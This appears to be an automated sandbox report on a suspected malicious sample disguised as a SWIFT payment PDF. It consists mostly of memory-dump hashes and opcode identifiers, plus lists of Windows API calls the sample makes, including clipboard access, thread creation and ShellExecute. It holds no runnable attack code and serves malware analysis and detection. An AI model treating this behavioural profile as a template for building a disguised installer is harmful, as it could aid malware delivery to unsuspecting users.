                                                                                                                                    • Instruction Fuzzy Hash: D9C1CF74E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0c73b7e98d41fe1661f03ffee80383f7d779dec6b980e06e462771ff4647ef21
                                                                                                                                    • Instruction ID: 1757e8dc78cf3e64b7878b62f10f31fe49743c95f957fa32ff90c62a7cc66204
                                                                                                                                    • Opcode Fuzzy Hash: 0c73b7e98d41fe1661f03ffee80383f7d779dec6b980e06e462771ff4647ef21
                                                                                                                                    • Instruction Fuzzy Hash: 17C1BE74E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 05464cf9fd6f135ef070214c03ff79078c6ee9e0c417e7b8cc64c2c49b795ef2
                                                                                                                                    • Instruction ID: 51168da622178adf7e0a66c62c4dcd654d1af134797c8e6c88fd38294e0d2e33
                                                                                                                                    • Opcode Fuzzy Hash: 05464cf9fd6f135ef070214c03ff79078c6ee9e0c417e7b8cc64c2c49b795ef2
                                                                                                                                    • Instruction Fuzzy Hash: 3AC1A074E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f2c8bf21eef970854adf3bf62c7c86603a1dddbac800d8667a71c0fb42ab214a
                                                                                                                                    • Instruction ID: c2ff29886bdd1fb605bc75abc58c9a13524a76d09f15954516b3519e95c8e410
                                                                                                                                    • Opcode Fuzzy Hash: f2c8bf21eef970854adf3bf62c7c86603a1dddbac800d8667a71c0fb42ab214a
                                                                                                                                    • Instruction Fuzzy Hash: 65C1B074E00218CFEB54DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c915de158c97c52ca6d3c0c2524cdb29d1668c284c9e74c28cdb9a9f3405b11c
                                                                                                                                    • Instruction ID: f53166b5cabc75065e877305b8ed7956763026ae67ddf0e4b388de6dd60ae465
                                                                                                                                    • Opcode Fuzzy Hash: c915de158c97c52ca6d3c0c2524cdb29d1668c284c9e74c28cdb9a9f3405b11c
                                                                                                                                    • Instruction Fuzzy Hash: DFC1CF74E01218CFEB14DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1ff46306e9ad0e1006557f50a52ed53a7a2d6f300fb1ccaf6d2e1d163093eaac
                                                                                                                                    • Instruction ID: 21ad23a2e4392e8ed2e3846b9b93d8e6b0f4fa5e0f66fac145956c5ce2c94f13
                                                                                                                                    • Opcode Fuzzy Hash: 1ff46306e9ad0e1006557f50a52ed53a7a2d6f300fb1ccaf6d2e1d163093eaac
                                                                                                                                    • Instruction Fuzzy Hash: 21C1B074E00218CFEB14DFA5C994B9DBBB2AF89304F1081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d3f5ea39eb1d6cd0b9d0fc639707eceea561a854c5d4f0a32de411d90b32f071
                                                                                                                                    • Instruction ID: a44e1dca17aa5834b2afa0c0e5e3d267850ab45fcfa62ec227d43020722dd4ed
                                                                                                                                    • Opcode Fuzzy Hash: d3f5ea39eb1d6cd0b9d0fc639707eceea561a854c5d4f0a32de411d90b32f071
                                                                                                                                    • Instruction Fuzzy Hash: AEC1BF74E01218CFEB14DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a50ae8a14c9c4472ebc544575d93f036a7559710160cec19c00d21358a85099f
                                                                                                                                    • Instruction ID: 6e8669508dc51667b3128ed6e4aacc0dce0746d2de092e1995c60e8e20217ace
                                                                                                                                    • Opcode Fuzzy Hash: a50ae8a14c9c4472ebc544575d93f036a7559710160cec19c00d21358a85099f
                                                                                                                                    • Instruction Fuzzy Hash: 5CC1BF74E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5feb05fb97ddc1be0409f96dc1f75344d02c80c3990ec8588eeb9cf83e4782c5
                                                                                                                                    • Instruction ID: a4a3bcca8b5877cd4bc4340c61b0c060dda214ef5e4e05089e06283c0c015237
                                                                                                                                    • Opcode Fuzzy Hash: 5feb05fb97ddc1be0409f96dc1f75344d02c80c3990ec8588eeb9cf83e4782c5
                                                                                                                                    • Instruction Fuzzy Hash: A1C1BF74E00218CFEB54DFA5C994B9DBBB2AF89304F2085A9D408BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6c815089e5ed2202f738d90a094420f63645d87e5b9bc6f90e3bc635b5796321
                                                                                                                                    • Instruction ID: 9d09dbb3a53b9e36b76fbbec59331082b15ff1a36216cd94d36efc512fa44242
                                                                                                                                    • Opcode Fuzzy Hash: 6c815089e5ed2202f738d90a094420f63645d87e5b9bc6f90e3bc635b5796321
                                                                                                                                    • Instruction Fuzzy Hash: F7C1BF74E01218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c162d6657000d215fa62a3050fc63c7c18e4e5c641a3cdb8eed60cf17922a70c
                                                                                                                                    • Instruction ID: 40ac3fdbb21fe20d4bafb6f69c09cdd437cb8814c2306403b25851fa8e123200
                                                                                                                                    • Opcode Fuzzy Hash: c162d6657000d215fa62a3050fc63c7c18e4e5c641a3cdb8eed60cf17922a70c
                                                                                                                                    • Instruction Fuzzy Hash: 65C1AF74E00218CFEB54DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1e359128f9efe28fa0aebdeea609c6abd4c4cf1c369c85f53ef879b6c0140dd0
                                                                                                                                    • Instruction ID: 8e1c999e518a7d4b38271427b4702aefe8f9c24dffdc5d834079693e8c03e261
                                                                                                                                    • Opcode Fuzzy Hash: 1e359128f9efe28fa0aebdeea609c6abd4c4cf1c369c85f53ef879b6c0140dd0
                                                                                                                                    • Instruction Fuzzy Hash: D4C1C174E00218CFEB14DFA5C994B9DBBB2AF89300F1081A9D809BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b6b84564e06bd0ee7bb8aac9875d2046adab71ce10ca20af73e6e13f3653d00a
                                                                                                                                    • Instruction ID: dcbff912b19ba86fc88862e038dacb7c83728367f71f2bc89da0bd06b6a646eb
                                                                                                                                    • Opcode Fuzzy Hash: b6b84564e06bd0ee7bb8aac9875d2046adab71ce10ca20af73e6e13f3653d00a
                                                                                                                                    • Instruction Fuzzy Hash: D0C1B074E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e4bf616c94487248c0759e0062014d572e9ce8fddf78de69870d58cfcd30427e
                                                                                                                                    • Instruction ID: b163640526c1422f9376b540360ef5af0efc0480d290f8bd75fd8ead5d4a5e69
                                                                                                                                    • Opcode Fuzzy Hash: e4bf616c94487248c0759e0062014d572e9ce8fddf78de69870d58cfcd30427e
                                                                                                                                    • Instruction Fuzzy Hash: E4C1BF74E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 888f2926d2d16288f1d2f6505b7b35278ef630fef49ae1a28fcd124e834bb380
                                                                                                                                    • Instruction ID: 8b729c1c2e0545ea79790fa4aa7108cc051595b9ac2f6cc36090489f9302efec
                                                                                                                                    • Opcode Fuzzy Hash: 888f2926d2d16288f1d2f6505b7b35278ef630fef49ae1a28fcd124e834bb380
                                                                                                                                    • Instruction Fuzzy Hash: 34C1AF74E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4aa6ebb74104055649175157afb534e50a8c4d3ca9e4b9c8cb8d0c62589fbce7
                                                                                                                                    • Instruction ID: 2a695d83b8bd542f8a04197186e599c4f859191796145628f7961f34ddddd15a
                                                                                                                                    • Opcode Fuzzy Hash: 4aa6ebb74104055649175157afb534e50a8c4d3ca9e4b9c8cb8d0c62589fbce7
                                                                                                                                    • Instruction Fuzzy Hash: B7C1A074E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 23fa3a2dd394ebb83c15a6776234d4b7f8ece20ec2af9745a3a9ea673c8cfb41
                                                                                                                                    • Instruction ID: e4ecb8a311d02dff65d0c0916be2c963281f37c6b7c77ab8991f3fcf7cd36e65
                                                                                                                                    • Opcode Fuzzy Hash: 23fa3a2dd394ebb83c15a6776234d4b7f8ece20ec2af9745a3a9ea673c8cfb41
                                                                                                                                    • Instruction Fuzzy Hash: 29C1A074E00218CFEB14DFA5C994B9DBBB2AF89305F2081A9D409BB365DB359E85CF10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 70d137bd580aeb051b231a312a33cff2683d8ddac7338baef2bae6bc0aed0c4b
                                                                                                                                    • Instruction ID: ac2ac508432e07a5ad6bb7e5fbedd7e9b7aab4ee6df645ad254c3389abea8110
                                                                                                                                    • Opcode Fuzzy Hash: 70d137bd580aeb051b231a312a33cff2683d8ddac7338baef2bae6bc0aed0c4b
                                                                                                                                    • Instruction Fuzzy Hash: 24C1AF74E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e6e1f9ddc9e1cf60b360d6973a96b2508d5414b883dea7917b4e970b97800387
                                                                                                                                    • Instruction ID: 74089b32113743fabf6bfdd3c10f9fd11a72d4a4107a52afc8f5f914d3c4b7b1
                                                                                                                                    • Opcode Fuzzy Hash: e6e1f9ddc9e1cf60b360d6973a96b2508d5414b883dea7917b4e970b97800387
                                                                                                                                    • Instruction Fuzzy Hash: ABC1BF74E01218CFEB14DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF11
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                      • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                    • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                    • CloseClipboard.USER32 ref: 00405676
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID: {
                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                    • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                    • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                    • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                    • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                    • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                    • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                    • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 184305955-0
                                                                                                                                    • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                    • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                    • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                    • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                    • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                    • String ID: -B@$N$open
                                                                                                                                    • API String ID: 3615053054-1057335957
                                                                                                                                    • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                    • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                                                    • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
